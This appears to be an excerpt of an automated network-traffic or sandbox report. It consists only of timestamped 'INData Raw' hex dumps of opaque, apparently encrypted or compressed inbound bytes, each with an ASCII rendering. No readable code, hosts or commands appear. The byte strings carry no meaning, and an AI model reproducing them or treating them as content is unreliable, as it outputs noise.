                                                                                                                                                2022-09-29 12:51:45 UTC19481INData Raw: 5d e1 57 88 0b de c1 9b da 77 2e 18 b4 40 37 cf 82 76 16 3d 90 ab 4c 1d a6 68 7c 28 5d e5 f7 c7 8f 29 0d 4c d2 a8 ce ff 84 57 d9 c3 91 a2 9d 4c d6 7c ac 5a b7 ff 28 c1 c5 51 8c 68 6f ea a4 ac 77 67 94 ad 72 d1 0c 3d ff d0 84 d4 9e 57 88 2e 18 ba 56 11 47 22 09 94 39 26 3a f2 1d b4 c5 b8 d2 97 a7 64 9d 1a 93 f6 58 c4 c8 dc 59 c3 15 1f 18 b2 4c 00 27 d5 3f 07 fd 40 3c 3a f7 c9 19 c4 d7 5c 83 b4 ad 70 3c ec e9 be 16 4e 91 4c ca d0 4e d8 7d dc 5a 21 d2 08 5c 95 24 aa c5 cd af 99 4b 5e 65 52 7f c7 3f dd b9 51 6a 72 20 bd 95 d0 82 df 26 45 93 09 74 7f 53 24 3c 23 80 04 91 df 70 ea be 91 a5 6a 5c 26 fb 73 30 dd fe 71 b2 30 c2 4b eb 88 4a ba a8 37 48 5c 27 d1 7b d7 08 9a 2b 23 91 27 59 ea 09 dc 4e 52 e3 f1 33 67 12 c4 ad 0f ce 02 f4 4a 8d 70 28 b3 0b 8c c3 11 b5
                                                                                                                                                Data Ascii: ]Ww.@7v=Lh|(])LWL|Z(Qhowgr=W.VG"9&:dXYL'?@<:\p<NLN}Z!\$K^eR?Qjr &EtS$<#pj\&s0q0KJ7H\'{+#'YNR3gJp(
                                                                                                                                                2022-09-29 12:51:45 UTC19497INData Raw: 92 af 46 1c 60 9b 3c 17 8a 1d 39 32 b0 09 ae 36 50 57 91 1d 55 ce 9c 91 78 44 31 37 10 53 75 d9 a6 79 bc 71 af f8 b7 a2 cf fa b0 47 6e 9c 54 35 a8 46 9e 7b 50 38 8e de f1 e3 9f 4d 87 1c 2d e5 90 55 0d 29 a5 b8 80 fb bc 55 5a e3 d6 fe c8 95 7e 9e 78 a5 fa a7 7d bf 4a 7a 42 0f 9f f7 31 eb 8a a8 e8 80 4a 95 92 8c 5b b5 c9 e1 46 89 3a 2e 8c b2 69 98 82 b3 2f f7 f9 c9 fe 72 2f 78 9b f8 a9 7e bc aa ce 7c 04 ca 95 6b e2 0d 00 15 9e da 5b fd c8 93 61 11 e8 e2 d1 2f 9d 36 d4 57 8e 26 c1 a9 6d 91 03 db e6 8f e9 9a b0 08 6c ff 9a ba 75 21 ca 82 b1 29 ac 2e c4 4a 0c 0e 3e 04 22 1c a5 5b dc 22 31 b7 f7 8c 51 17 26 ba f1 76 e7 42 d0 ff 3e cc 7b 62 f2 80 36 4c a7 ad 73 ca de 86 b9 45 e9 90 b3 40 aa 23 19 13 fe 47 05 c0 b1 9d d3 1d 37 c9 8d 05 d3 eb c1 a6 3e b0 36 d3 8e
                                                                                                                                                Data Ascii: F`<926PWUxD17SuyqGnT5F{P8M-U)UZ~x}JzB1J[F:.i/r/x~|k[a/6W&mlu!).J>"["1Q&vB>{b6LsE@#G7>6
                                                                                                                                                2022-09-29 12:51:45 UTC19513INData Raw: 1b 27 12 55 2d 6b f2 d1 95 f2 46 fd a5 63 69 d7 dd 76 da 5a 50 95 f0 44 64 97 8f 10 d8 e1 4b ce 28 1c 34 ca dc 4a 7e 1e 9c 7d c7 fc b7 2e ec 96 8c a9 b2 c6 00 3d 46 a4 de 6a 57 51 26 50 a4 a2 42 88 e0 50 95 d2 0b 1f be eb d9 e4 a7 1e 13 d3 74 fc 4e d8 03 a5 d4 58 5e 2d ec 59 82 b2 51 a7 c1 f1 9e 91 20 f4 d1 8a 04 d1 ee 1e 98 a8 f3 75 3e 09 7e 0b 2a 0d 1b 1b b9 34 fb 19 ac 87 52 81 35 b7 1d 8e c2 b0 f1 26 85 87 49 b0 7c 91 e4 0c 6c 5a bb 5e 10 d1 24 8c e4 16 fd eb 7b c5 63 e8 87 f0 31 d8 58 e1 13 9b 27 c6 15 0d ed c5 75 b8 09 86 21 11 32 c3 65 4b 93 ca 85 ee 65 5a 80 07 c9 49 09 0c e0 5d 9d 3c 14 0f 45 21 7c c3 6e 41 85 6b 15 19 ed 90 b7 64 72 b3 da f4 2a 27 52 8b 57 fd bc a5 1b ca 35 c5 78 41 9a 54 9f 22 16 9c 24 82 d0 30 1b 2d 9b d3 cf a8 bb 70 6c 20 98
                                                                                                                                                Data Ascii: 'U-kFcivZPDdK(4J~}.=FjWQ&PBPtNX^-YQ u>~*4R5&I|lZ^${c1X'u!2eKeZI]<E!|nAkdr*'RW5xAT"$0-pl
                                                                                                                                                2022-09-29 12:51:45 UTC19529INData Raw: 5a 35 52 77 df 22 05 0c b7 22 af 65 be 59 9c c3 8b 45 66 06 d2 31 11 d5 23 84 01 ae 04 8e d8 be 92 ed 8a 98 41 9f ee 5f b8 7c fd 2b d1 42 c9 06 19 2d d5 2f d0 01 24 a1 24 00 99 e8 15 78 71 94 a5 fc 14 81 ef 74 8d fa 16 9c 77 a0 b9 41 b6 82 83 cb 48 d7 dd 87 59 b0 08 c7 6a 05 d0 6e ab 39 f6 7d 36 e0 4a 26 42 4e ab d4 82 4d d0 b2 8c b4 a8 9b fd a4 e1 5a 5e f9 45 44 23 b2 87 d0 f0 94 04 89 cc 15 a7 1a 6f 5c 49 f6 9d 72 79 e9 04 b3 11 a8 3d 1b 0e 1d cb 59 09 7e b8 ed 8c f1 24 c7 66 6f 3e 6a 62 61 d9 bc 94 41 c8 ce 6e dc f1 c8 3e 44 2f fa ec 5f c4 48 59 15 a6 9a 28 ce 2c 8d cb a3 15 c7 0a 74 90 6c 87 5e a2 df 1c ed ea 98 0e e8 83 c6 2f 23 1e a5 f8 41 45 b3 0a 46 2c bc 24 a1 8e 28 ba e8 74 51 56 c3 cc 96 f2 d5 1b c4 84 44 81 7f 45 08 be 69 83 cf 35 85 9f 47 cd
                                                                                                                                                Data Ascii: Z5Rw""eYEf1#A_|+B-/$$xqtwAHYjn9}6J&BNMZ^ED#o\Iry=Y~$fo>jbaAn>D/_HY(,tl^/#AEF,$(tQVDEi5G
                                                                                                                                                2022-09-29 12:51:45 UTC19545INData Raw: 28 4e e2 fc da 1c 7e bc 4e 5e eb fa fa 9f b9 8d d3 6e a8 b4 fe 2a eb ec ba d8 71 b3 f5 76 4e 08 ef 84 bf 45 57 1f b5 c3 61 6f ee 37 4e 39 92 3f f8 6b 97 e1 99 22 c2 f3 47 85 8f e5 38 6f 26 51 29 49 ac 46 53 89 c1 96 57 6d fb 50 e4 38 3a 52 a1 38 da 6a e5 a0 fd 68 e8 78 6c 1e e4 f3 08 b1 f1 8a bc 86 f9 34 92 b7 00 aa c5 da 7b 35 23 56 f2 c9 49 bf de 06 f4 f1 2d 81 00 a4 a0 7a 22 3c 76 e9 23 07 3e 04 80 54 c0 16 de 9f ab 89 ff a2 9f ba fe da 7f 58 17 4e 9f e8 3f 7b 08 7f 0e a8 be c8 1d d5 9b 8e bb 07 40 0c 5c 26 25 cc 36 4f b6 08 81 df eb 64 f7 03 59 3c 6d ad bc 51 33 88 12 54 85 15 aa ef e7 72 c2 e7 0c 07 01 bd 2d 62 f4 6b 83 93 9b c6 fe 92 b7 20 34 c3 20 48 35 8e 70 65 71 67 a2 41 c5 d0 86 27 bf fa 57 06 07 35 52 56 0c c0 60 27 6b b8 56 8f d6 44 e3 6f 10
                                                                                                                                                Data Ascii: (N~N^n*qvNEWao7N9?k"G8o&Q)IFSWmP8:R8jhxl4{5#VI-z"<v#>TXN?{@\&%6OdY<mQ3Tr-bk 4 H5peqgA'W5RV`'kVDo
                                                                                                                                                2022-09-29 12:51:45 UTC19561INData Raw: f0 77 f7 93 97 3c 55 a3 0c a1 6e 22 f1 29 77 5e 62 07 03 0e 7f e6 92 e0 2d 0c 93 d5 bb 5a 42 8c da 25 f1 23 bd c4 4e 8f d3 13 64 aa 91 26 21 15 72 41 8b 2d 8f f6 31 b7 30 f5 47 00 aa 05 98 88 08 78 95 5a 83 6f 33 88 b7 6b 1f 5e 7f b2 84 fc 31 7b 5b e1 bc f6 a1 10 89 d0 37 c1 a3 14 68 65 b6 7f 58 20 52 75 13 f7 b7 5d 1b da c4 a9 79 cc 69 f5 9a 4e 86 5b 72 be 6a 55 9c be ca c8 a9 94 23 64 9a fc a9 5a ce 56 25 da 08 44 aa 7a 29 ca 15 d5 04 6d 03 6f 4b d9 4f a6 44 98 7a 0f 7d e4 f2 97 a2 6e a7 a8 fc ad 55 29 4e 35 ce 02 e0 97 a4 5a bd c4 ea 3f 49 61 71 b8 aa ea 84 ab f4 e7 ab b2 7c af fd c6 8a 1f e5 7a 60 57 30 e6 bc 5d 2a cb 3d cd ae 66 19 4f f5 64 16 36 fc 5b 62 0a 6e 55 bf 0a 22 3f 3a 98 21 55 76 cf 96 2f a0 d6 83 f0 f9 88 b6 6f 8e 8c 8d 3c 95 86 81 29 52
                                                                                                                                                Data Ascii: w<Un")w^b-ZB%#Nd&!rA-10GxZo3k^1{[7heX Ru]yiN[rjU#dZV%Dz)moKODz}nU)N5Z?Iaq|z`W0]*=fOd6[bnU"?:!Uv/o<)R
                                                                                                                                                2022-09-29 12:51:45 UTC19577INData Raw: 4f 80 bc 21 fd 88 0c 80 99 3f ad 22 d7 10 22 de 5e 22 a6 20 d1 43 11 45 e1 78 85 21 b2 f8 d2 3c 59 84 d4 ef 79 bf da 4d d9 eb cd e0 92 35 4c 3b 07 8a f8 f0 d8 48 d0 a9 a1 76 dd ec e8 4e 24 de 1e 71 16 b2 bb 8c 31 f5 ad 67 04 55 35 5a 5b b2 bd 2d 63 46 c7 ae 78 04 27 58 f0 83 33 77 81 c3 90 ba 34 b4 a1 59 d5 c7 d4 ba 30 c3 e4 91 86 7e b8 60 05 be 20 4c 14 e4 b0 c6 3d 48 25 1d 29 25 51 1f 98 15 43 f1 74 cc a9 da 21 56 b5 7f 9d c3 50 72 26 b4 c4 e1 1b 22 4a 8b ea 4e d6 32 01 dc 5f 5a f3 6b 01 2c 8c a5 f1 9c 47 e3 f4 71 31 40 f1 3a 12 c5 7f 37 5b 60 69 0a d9 d9 d4 4f 08 17 7e 63 50 5f 63 84 52 19 17 d7 7c 3d 30 b4 d5 e0 02 be f6 cd 04 26 61 a7 6d 74 86 a9 98 2c b0 e5 e1 2f 46 55 ec 64 17 da 7e 99 9b 24 d2 a0 bb c8 83 c4 70 6b 3a 07 f3 a1 a5 f7 bd 81 7b d2 c6
                                                                                                                                                Data Ascii: O!?""^" CEx!<YyM5L;HvN$q1gU5Z[-cFx'X3w4Y0~` L=H%)%QCt!VPr&"JN2_Zk,Gq1@:7[`iO~cP_cR|=0&amt,/FUd~$pk:{
                                                                                                                                                2022-09-29 12:51:45 UTC19593INData Raw: 57 29 a2 90 d7 26 97 95 cb bd 94 51 ed 4e 8b 5f 55 98 5e 29 31 30 5c 58 8e 56 50 1e 71 4e a0 6d 80 b7 c4 0b 8e b1 2d 4e 29 2a 2e cc 3f 9a 3c 9d 97 b9 95 84 41 a0 9e 5c 53 93 fa fa de 43 a4 45 a1 09 bc d6 c3 c1 41 a0 57 1d c8 1a 06 a8 23 cc 47 20 70 41 80 50 18 e8 d6 22 fa 2e 70 4e 03 44 8d c6 e7 6e 24 b6 3d a1 27 0b 22 26 55 08 5d 6d c3 bd d0 72 2c f6 b2 76 35 77 23 03 67 b9 8e 7b 87 f1 50 76 ba 75 0e ac ab 47 f9 be 17 ac 80 6e 03 2a d6 53 21 a7 d1 68 d1 df 57 fb 9b 6c 4d ab 43 2c be 61 be fb 22 c0 a1 bb fd 00 02 c3 6a 24 96 0f de 17 e4 d1 96 92 7d 8f 27 69 95 cd fd 40 9f 27 4d e7 26 88 41 6c 2f 50 99 da 91 37 df 6b 27 c8 ee 56 cc be b6 40 7e c9 15 a9 65 21 3a 5c 7d ed e4 74 ca c9 f1 70 f0 d6 ea c8 1c 79 72 9c 48 99 69 43 a0 17 4d 15 82 74 40 f6 25 1b d8
                                                                                                                                                Data Ascii: W)&QN_U^)10\XVPqNm-N)*.?<A\SCEAW#G pAP".pNDn$='"&U]mr,v5w#g{PvuGn*S!hWlMC,a"j$}'i@'M&Al/P7k'V@~e!:\}tpyrHiCMt@%
                                                                                                                                                2022-09-29 12:51:45 UTC19609INData Raw: 9c d7 4d a5 83 e7 4f d9 25 8f 1f 86 e3 81 ee 0d 68 5c dd 41 1f 41 5b 2c 99 41 55 32 8b c4 6d 4c fe 22 bb f1 41 b3 e4 d1 99 f3 a7 69 f0 65 3c f6 58 ee 92 af e0 55 d5 8a d2 92 10 69 79 97 5e bb 01 57 98 12 55 e5 75 d9 8a 43 e8 e8 f9 17 71 4d 6a 46 76 dc d6 7b 53 d6 38 26 12 4e 55 4c cd ab b8 ca 0a 7b 28 10 a7 a7 c7 44 c1 cb 89 52 91 45 6e a2 28 da 0c fc 2c 88 f0 c7 e0 b2 7c 05 0e 65 9d b7 cd a9 da 72 84 00 72 05 e8 81 23 c6 9b c0 ae 86 10 d8 b0 77 e8 db a8 a4 a4 da 87 88 ab 28 a2 30 f6 f0 75 22 c6 98 4f 46 1d 5b bb 94 d1 6a b1 25 95 a1 fa c5 36 8c 60 f9 27 e1 7d 9d 15 68 45 1c a8 41 3d c8 c0 78 41 10 a5 be 0a ca 5a 07 2c 85 1c e2 cc b9 d4 4d 8e 4a ce e1 15 f6 71 71 ca 7d 9b 88 d1 6c 01 42 f9 bc c0 2c 04 00 1f 73 20 5d cc 7c a4 9d 21 cf 7f 4d a3 0e 89 56 34
                                                                                                                                                Data Ascii: MO%h\AA[,AU2mL"Aie<XUiy^WUuCqMjFv{S8&NUL{(DREn(,|err#w(0u"OF[j%6`'}hEA=xAZ,MJqq}lB,s ]|!MV4
                                                                                                                                                2022-09-29 12:51:45 UTC19625INData Raw: bb 5c 11 b1 ae 78 dd 9e 87 1a 37 dc 89 39 b2 36 8c ee 79 82 b3 24 89 bc dc d8 2d cc 5c df d0 e6 08 06 82 45 7c 1e 71 01 d4 6a 44 04 39 1d 75 f9 84 cd a6 7a 67 9d d2 76 b1 6e a1 85 a1 ba e3 fb 06 d7 92 00 ec b2 8e 07 4f 3c 14 91 b6 40 ca b6 c4 4d e9 68 e3 2b ca 3a 5e ef bc f8 6a f9 12 1a d3 cc c3 9e 0f ba 43 ac 30 4f e6 43 71 5f 3e 11 52 45 3f 4b fa 47 4b f6 ca b9 d2 f8 9e f3 2c 7d c9 fe 27 33 49 d0 9b 7c 30 cb 52 19 e0 ac ad 89 9a 02 0a ae 1e a9 c7 12 84 ce 4c 4e b5 94 30 d4 b8 66 a3 38 ca cf 09 08 d8 a2 e5 08 d1 5c 60 df af 7f 50 65 ed fe 32 18 30 86 89 1f f1 fb 0d d1 95 64 cb d9 28 9b d2 bd c0 2d 55 15 11 e9 75 ac f9 41 5a d4 91 37 88 89 37 25 43 c2 12 b3 f3 1b 9b 0b aa af 15 87 a3 53 08 02 e2 9a 5b df 41 f3 a3 3f 0b 1f 17 64 d9 9c b9 06 3b 47 01 f8 36
                                                                                                                                                Data Ascii: \x796y$-\E|qjD9uzgvnO<@Mh+:^jC0OCq_>RE?KGK,}'3I|0RLN0f8\`Pe20d(-UuAZ77%CS[A?d;G6
                                                                                                                                                2022-09-29 12:51:45 UTC19641INData Raw: d1 44 f2 26 81 05 3d ab d6 47 ce 23 3c 6e 1c 6c 10 87 7a 0a 64 d6 bd f1 42 09 3c fe ac c5 86 7f 78 c1 1c 87 51 a0 cd 28 99 f3 0b e8 f7 ab 8f f4 59 bb da e6 1b 74 9f f9 aa 43 19 c5 69 74 3b 71 4c a7 0f b9 3f 21 7d f0 6b ea f0 ce 57 b0 96 65 12 10 98 c4 2c 72 e8 0c e6 bc d4 68 69 f6 f1 94 1e 5d 63 d8 54 c0 49 72 a5 b3 20 8d ef bc f0 ec 83 a2 e6 b6 c2 9a 04 cd 46 bc 52 4e 84 3a 17 c9 04 40 f9 7d f0 a9 79 ef 94 21 7a 3e bd f1 59 9b f4 e6 c1 09 47 73 cf 73 c3 fd c7 6b 8c 21 56 3d a1 49 3d d1 f5 d2 fa f9 ec f6 a4 75 6a 0e 30 57 cd 86 03 43 a4 53 15 bc 45 7a dd 90 f8 ae d1 86 3e 34 1f 54 b5 56 1c ab b1 aa 13 56 b2 ae 5f d7 8c bf 7a 2c dc 9f c2 86 68 aa 05 2b d1 51 27 eb b4 87 49 a6 4a 52 31 26 27 c6 7d b8 6a 48 46 fe b3 ed 70 49 65 5f 65 d4 38 25 71 6d 66 32 ac
                                                                                                                                                Data Ascii: D&=G#<nlzdB<xQ(YtCit;qL?!}kWe,rhi]cTIr FRN:@}y!z>YGssk!V=I=uj0WCSEz>4TVV_z,h+Q'IJR1&'}jHFpIe_e8%qmf2
                                                                                                                                                2022-09-29 12:51:45 UTC19657INData Raw: 2a 35 db ec e9 23 1a fb 18 8e c6 74 c4 0b 7d 82 32 5a 0c 43 53 f3 ce b8 7c 36 b3 06 bd 29 21 33 33 6a 18 aa 1a 12 dd c9 21 84 f2 d7 f7 75 a0 cd 84 cc ac 02 58 e6 d6 42 17 97 60 48 43 86 99 8b 34 61 04 04 42 7b d3 6e e7 6b a1 7f 30 36 a8 20 68 64 55 b4 be 6f 3a a7 10 a9 ba dc 8d 06 dd 0b 3e 6b f6 ba cb 06 64 c8 e8 fb 4d ae cb e3 df 32 9d e3 33 5b 20 3a 66 43 ae df 81 cb 8f ff aa 1f 4d c1 38 3a bc 56 00 6a cc 2c 5c d5 8f a7 bd e9 b8 00 e2 da d0 35 76 c9 56 05 35 75 8c cf 18 87 4d ca bb bd 07 b9 b7 d9 78 4d dd 48 4f c0 aa db c2 0f 03 cc 9a bb 82 db 31 b4 7a 2c fb 85 57 cc 64 f4 6d ee 02 e9 23 aa 68 90 0e 99 9b af 6a 73 8b 01 0d f6 35 ce ff 59 74 37 d7 b6 73 bb 21 d6 08 93 7f d9 b1 22 2e 8b fe d5 2a c6 5a 9a 23 e7 e4 55 6f 49 fc 8e 27 0e b5 58 2e 01 7c 18 2b
                                                                                                                                                Data Ascii: *5#t}2ZCS|6)!33j!uXB`HC4aB{nk06 hdUo:>kdM23[ :fCM8:Vj,\5vV5uMxMHO1z,Wdm#hjs5Yt7s!".*Z#UoI'X.|+
                                                                                                                                                2022-09-29 12:51:45 UTC19673INData Raw: 9f 2c a9 1e 3e 1b 0c 78 17 10 fb 70 c9 cb 64 27 c1 5f 5d 4f 6e 86 13 15 ba 98 b3 1d e6 65 29 59 86 3a 1c f1 e8 b9 5b c4 ad 73 a0 2a 4c 87 99 57 97 2c 59 a6 64 df 2e 04 39 b3 5f de cd 7a 4c 3e 2e 8f c0 82 ab d3 d5 da 69 8f 9c c2 66 86 f0 4c ca 52 02 ae 88 59 9f a8 dd a1 7f 54 1a 54 5a 2f c9 75 6b 4e 7a 73 03 05 30 ad 1b e7 58 d4 32 82 b4 d1 d3 9f 64 c7 6f 1d f3 0e 4f b7 10 5f dc 75 2f 6e 9e 77 b7 e3 69 eb 50 f7 fd 86 99 58 6e c6 f6 aa 04 2d f8 26 8e aa c7 21 47 36 2d c0 76 96 14 3f f7 4f 5e 1e 28 5b 6f 19 5b 86 8c 50 5a fd b9 50 19 7d 5c d8 29 c6 55 5a c0 b0 ea 17 6f dd 63 60 c8 05 0c 0f ce ae 68 d0 9a 16 d8 73 90 f8 77 21 a3 dd ee 91 b1 f7 03 a7 70 c7 9a 57 bc 74 63 b1 19 db 55 5f 55 90 a1 eb 86 3d ce 3b 55 c7 6e ea ad 3b d6 61 52 da 32 c3 19 e2 8e 19 25
                                                                                                                                                Data Ascii: ,>xpd'_]One)Y:[s*LW,Yd.9_zL>.ifLRYTTZ/ukNzs0X2doO_u/nwiPXn-&!G6-v?O^([o[PZP}\)UZoc`hsw!pWtcU_U=;Un;aR2%
                                                                                                                                                2022-09-29 12:51:45 UTC19689INData Raw: b8 db c3 ed c8 f1 bf 8f ae 4a 49 27 bc a4 b4 95 2d da 00 e6 f4 d2 2a fe 21 e3 f6 92 52 4c ab 9a 1c dc ee 47 75 aa fd b9 df 5c 2b 72 59 d8 49 49 00 1b e6 04 a7 c5 6a a7 95 c7 cc 9d 77 a8 c6 0e 6b ab 47 a0 c5 f6 1e d0 c4 45 e3 05 f4 f8 3d 46 9d 3e 42 5c a4 eb 7d 8a 44 16 a4 e5 17 97 ba bf b4 2e 49 0a 06 a1 ed 5c 69 63 27 53 1a 49 41 0b 6d f9 b5 04 fe 1a ee ae d7 92 3f 0d 8c c7 93 ab 5a 19 56 16 fd 0b a7 20 18 89 31 4d 51 e0 47 78 41 18 72 96 b7 17 d4 c6 51 05 34 1c cb ba 90 d8 b3 5b 65 9a 4f dc e6 7b e6 72 18 6b b6 60 9f c5 88 fc f1 d8 9c 2b 99 3a 4f df 1c a7 55 9d 73 9f 99 5e 66 9f 10 94 ad c6 33 90 89 b8 64 88 f1 97 ce f1 9f b2 f2 91 63 17 92 9e ed ec c1 7c 37 13 9c cf 08 fd b5 32 be bc 6b 59 f2 e0 24 b0 d9 24 e4 8e 84 65 27 3f 7a b2 52 2a 79 42 b4 4b 89
                                                                                                                                                Data Ascii: JI'-*!RLGu\+rYIIjwkGE=F>B\}D.I\ic'SIAm?ZV 1MQGxArQ4[eO{rk`+:OUs^f3dc|72kY$$e'?zR*yBK
                                                                                                                                                2022-09-29 12:51:45 UTC19705INData Raw: 84 ca 26 59 12 ce 24 47 1f 9a d9 79 03 fb 66 2e 22 26 1a 86 df 07 59 bb 29 d3 a2 da fc 81 3a 53 ba 25 c7 ba 9a 0d c2 aa 09 e6 3a ba 1d fa 22 90 be 69 c3 d5 f5 0f 47 be 43 5c 70 5d c9 68 00 09 0b b2 21 33 2b 20 65 a4 7f 13 f2 bd e0 be 4a ed aa 35 f1 03 e9 75 12 e0 fa ba c3 03 a2 9d 4e 95 9c e3 24 58 1c f5 95 76 da 94 92 f7 02 5f 26 76 08 1e dc 63 61 2d 4d 09 dd 2c a1 81 b6 23 45 a4 96 fa 81 a4 7d de b8 37 af 3f c5 be 57 49 71 f6 76 92 e2 51 10 0c 9e 71 b8 10 d2 91 dc 5f 9c ae c3 11 9a f9 5d de e2 47 66 a3 a8 93 05 2c a1 0e 1e 64 d4 83 02 d6 b9 bd cc 76 fd 56 31 da 64 a1 1d cf c4 4e f4 af ce 9b 07 ef db 83 9b fc 19 80 a8 71 c4 49 4b 7a ed b7 43 51 48 93 e0 36 e1 3f 87 8e fb 6a 75 6c 50 9a 2d 8d c1 3c a0 8f 75 07 87 a9 2e 96 96 b6 ff d5 1f 5f b7 e7 9f d4 1e
                                                                                                                                                Data Ascii: &Y$Gyf."&Y):S%:"iGC\p]h!3+ eJ5uN$Xv_&vca-M,#E}7?WIqvQq_]Gf,dvV1dNqIKzCQH6?julP-<u._
                                                                                                                                                2022-09-29 12:51:45 UTC19721INData Raw: de 7a 7f ba 10 ae 04 d6 4c 75 b6 34 ba 9d 98 1c 66 7e 83 1d 13 68 65 1d 51 15 b7 2e 89 f6 94 2c 36 f9 9e b2 3b 63 a1 43 da 1b a2 c5 dc 39 c8 86 8e 2a 18 c2 36 44 e0 bf 3e 4a 6e ab 49 9f c5 01 17 7b d2 cd 8d c6 ad 7f 9e a3 11 97 f8 d3 c9 7c 43 47 2d b3 7e 62 d2 81 b9 99 68 e4 01 b6 ec 31 21 43 1f b6 5e a5 8e bf 0a a4 45 47 4b 87 ac 58 34 a6 65 64 09 42 68 c0 66 cc c0 d5 d8 3d 0e cb ac 13 5d 6c cf 63 1a a2 0b a4 d3 71 03 9a aa ad 84 61 50 4e e8 81 b4 61 5d fe 53 ec 28 0b 49 34 ec a3 17 08 aa 84 95 4c 19 93 ea c8 d2 94 59 b3 cf aa b3 85 9a 39 94 26 4a 57 12 33 c9 9c e2 f4 77 54 c1 a5 44 1a 72 9d d5 df 17 9d 91 b4 20 89 84 f7 be 93 ea 29 be 7e eb 27 ff 29 ae 4e fc 79 c2 ff af d5 45 d2 aa 87 77 0c 11 60 aa 2e 46 b8 04 c2 31 e7 0a 1c dd 00 a8 98 b4 b5 0f 44 e4
                                                                                                                                                Data Ascii: zLu4f~heQ.,6;cC9*6D>JnI{|CG-~bh1!C^EGKX4edBhf=]lcqaPNa]S(I4LY9&JW3wTDr )~')NyEw`.F1D
                                                                                                                                                2022-09-29 12:51:45 UTC19737INData Raw: 0b 7e 25 ab df 2e 78 0f ae 60 24 19 d4 58 4a 80 8a 06 c6 2f bb 49 3f 42 48 08 8d ff a9 af 38 95 08 e4 b4 1c d7 f1 83 35 97 38 63 81 7c 73 46 66 80 68 bd 17 9d 65 9a a5 22 37 cb c0 d2 11 59 86 e6 0c 77 b2 f0 68 19 26 d4 bd 97 29 c6 54 48 5a 74 80 e3 9a bf 50 11 90 a3 aa ad 37 7b e3 fb a0 d0 d8 fe da e6 b0 45 f5 e1 b8 8a f3 4e 99 e5 2c 5c 73 ae 90 1d 1b 54 d9 e0 2d 89 01 ba 02 7e fa fb f2 2b 08 bf 6b 95 51 97 58 77 a3 3e ba 25 6e 4b 7b fe 85 6d 8f ac 26 f2 af e4 dd 77 3f 55 7a c4 17 6d 2e df 33 ea d9 b7 c5 91 5b dd bf f3 3a 2e a2 38 b4 68 9b 87 ab fe aa 01 cf e6 7b da a3 9a 8b 5a 04 0f 22 d3 85 e2 fe 29 d3 67 f0 ee e4 a7 27 62 9d 03 70 fb 45 94 5f 42 43 bf 84 cf 6d c8 e0 45 5d 1d a4 75 b6 3c 55 95 96 31 e7 89 12 15 09 3e fa ba eb 8d a9 04 a0 c9 9c cd 46 dd
                                                                                                                                                Data Ascii: ~%.x`$XJ/I?BH858c|sFfhe"7Ywh&)THZtP7{EN,\sT-~+kQXw>%nK{m&w?Uzm.3[:.8h{Z")g'bpE_BCmE]u<U1>F
                                                                                                                                                2022-09-29 12:51:45 UTC19753INData Raw: 1b f7 9a 0d 25 61 d1 23 cd bc 46 bc 04 04 d5 cd b5 55 6c 8f 63 53 ae 6c cf 3d 56 5e 69 e8 33 e7 f2 90 cc 41 69 6b 36 05 1c 6f bd 9e 15 6e d0 25 78 d7 10 1d 01 2f e6 47 2b c3 e8 3d 91 db 88 ae 61 c7 76 ce c0 50 c9 81 a0 7f e1 30 1b 08 14 47 91 d5 80 3f 0e 50 de ff 67 41 d5 a8 c1 39 31 bb dc 0d f1 e8 7f e7 be 7e 0f ee 69 40 13 f2 01 78 1b a5 83 20 a0 c9 cf 77 c2 68 39 74 45 db a9 ac 84 7e a1 36 1f 3a 5f 65 27 a4 35 b0 38 f5 ef 5e 3b c2 2b 33 76 c1 12 8d e7 7f b4 fe fc d3 ab f9 de 5c d1 84 cf 27 3e a6 f4 02 67 8b ae 93 f5 3e e9 f6 28 b9 81 24 e1 3d 94 5a 2b 25 36 49 a1 70 72 7e 87 95 5d da 1a b4 95 a7 53 52 0f e9 0c 5c 47 1b 04 2a 94 e9 ab f5 8e 5a 8f 3b 26 0a 46 4f f4 3b 3f 79 9d 78 01 3e 6c ba 4b dc c8 fe 54 8a de d1 4c b4 55 b6 1e 8c e4 d1 57 d5 0c f2 4a
                                                                                                                                                Data Ascii: %a#FUlcSl=V^i3Aik6on%x/G+=avP0G?PgA91~i@x wh9tE~6:_e'58^;+3v\'>g>($=Z+%6Ipr~]SR\G*Z;&FO;?yx>lKTLUWJ
                                                                                                                                                2022-09-29 12:51:45 UTC19769INData Raw: c7 96 e5 ee 47 9b 60 62 41 76 3f be 12 7d 2a 8f 95 59 ca 06 48 c3 8b c1 e0 b6 65 6e 75 f8 dc 7f 90 14 e2 33 cc 1a 1c d5 9f 86 e0 37 a6 23 d7 6a d6 19 c1 5b 46 dd 7e 83 df 90 fc 26 2b db 28 7d d0 d4 e5 54 56 62 61 56 e7 cf 8d 74 84 4d f3 40 11 2c 71 8c e8 14 84 28 fd 0e 76 f4 e8 bb b3 d1 78 53 43 71 fa 15 64 29 4e b3 1f 89 15 95 f3 34 cb 80 64 a9 f5 b9 ca 40 61 4b 8b d0 8a 08 ec 47 68 dc e9 c4 90 04 86 a0 80 e2 d1 47 2b 51 53 b4 a6 8f a0 87 a5 f4 41 f1 e5 a9 79 c3 58 0c b0 70 5e 54 17 6a d3 79 98 32 5b 91 0f 6d 02 1b 6c 2a bb 48 11 30 2a 65 59 5b ec e1 00 04 8e a4 48 41 2b 32 8c d0 7f e6 cb 7e 1e f8 bc ed 6d 36 1c e8 00 c1 6f 0a 16 91 0a 10 e4 4f 19 9a 57 bc 9e 4b 4a 2c 95 f9 86 ad 97 7f 6c 0a 2e b6 09 5a 6c e8 5b df 00 05 f7 b7 9e 1c 8c 8c 80 f3 b7 6c 91
                                                                                                                                                Data Ascii: G`bAv?}*YHenu37#j[F~&+(}TVbaVtM@,q(vxSCqd)N4d@aKGhG+QSAyXp^Tjy2[ml*H0*eY[HA+2~m6oOWKJ,l.Zl[l
